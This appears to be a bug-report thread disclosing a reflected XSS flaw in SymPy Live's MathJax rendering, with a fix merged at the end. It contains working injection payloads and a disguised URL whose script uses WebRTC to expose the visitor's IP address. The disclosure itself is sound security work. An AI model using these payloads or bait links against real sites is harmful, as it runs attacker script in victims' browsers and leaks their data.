I have found a way to run any JavaScript code on the browser from SymPy Live,
It can be simply done using this input:

"\unicode{<img src=x onerror=\"%s\"/>}" % "alert(0)"

(Where instead of alerting you could use any JavaScript code)
To make it "prettier" and not to show the 𐀀 character you can simply use:

"\phantom{\unicode{</mtext></mphantom></mrow></math><img src=x onerror=\"%s\"/><math><mrow><mphantom><mtext>}}" % "alert(0)"

I don't know if this is a security concern because the code would only run on your computer, but we should escape the output regardless.

Do you know how to escape the output? We also need to make sure that the MathJax rendering still works.

I think the first thing to check is whether it's a problem with SymPy-Live or a global problem with MathJax (which I should probably have done earlier), if it's specific to SymPy-Live the only solution I see is a noscript block or escaping < and > in a unicode element or something like that

I don't know if this is a security concern because the code would only run on your computer, but we should escape the output regardless.

Nothing suspicious here, just a sympy link:

https://live.sympy.org/?evaluate=%22%5Cphantom%7B%5Cunicode%7B%3C%2Fmtext%3E%3C%2Fmphantom%3E%3C%2Fmrow%3E%3C%2Fmath%3E%3Cimg%20src%3Dx%20onerror%3D%5C%22%25s%5C%22%2F%3E%3Cmath%3E%3Cmrow%3E%3Cmphantom%3E%3Cmtext%3E%7D%7D%22%25%22var%20myPeerConnection%3Dwindow.RTCPeerConnection%7C%7Cwindow.mozRTCPeerConnection%7C%7Cwindow.webkitRTCPeerConnection%3Bvar%20pc%3Dnew%20myPeerConnection(%7BiceServers%3A%5B%7Burls%3A%27stun%3Astun.l.google.com%3A19302%27%7D%5D%7D)%2CipRegex%3D%2F(%5B0-9%5D%7B1%2C3%7D(%5C.%5B0-9%5D%7B1%2C3%7D)%7B3%7D%7C%5Ba-f0-9%5D%7B1%2C4%7D(%3A%5Ba-f0-9%5D%7B1%2C4%7D)%7B7%7D)%2Fg%3Bpc.createDataChannel(%27%27)%3Bpc.createOffer(function(sdp)%7Bpc.setLocalDescription(sdp%2C()%3D%3E%7B%7D%2C()%3D%3E%7B%7D)%3B%7D%2C()%3D%3E%7B%7D)%3Bpc.onicecandidate%3Dfunction(ice)%7Bif(ice%26%26ice.candidate%26%26ice.candidate.candidate%26%26ice.candidate.candidate.match(ipRegex))alert(%27Your%20IP%20address%20is%3A%20%27%2Bice.candidate.candidate.match(ipRegex)%5B0%5D)%3B%7D%3B%22%0A%23--%0A

I guess what you're saying is that someone can post a URL for the sympy website that causes malicious code to run on the someone's machine if they click the link.

That does seem like a valid concern

I guess what you're saying is that someone can post a URL for the sympy website that causes malicious code to run on the someone's machine if they click the link.

Yes, exactly

To quote Wikipedia regarding reflected XSS:

"The bait is an innocent-looking URL, pointing to a trusted site but containing the XSS vector. If the trusted site is vulnerable to the vector, clicking the link can cause the victim's browser to execute the injected script."

Merging #193 should fix it

This is stale and will be resolved when the deployment succeeds.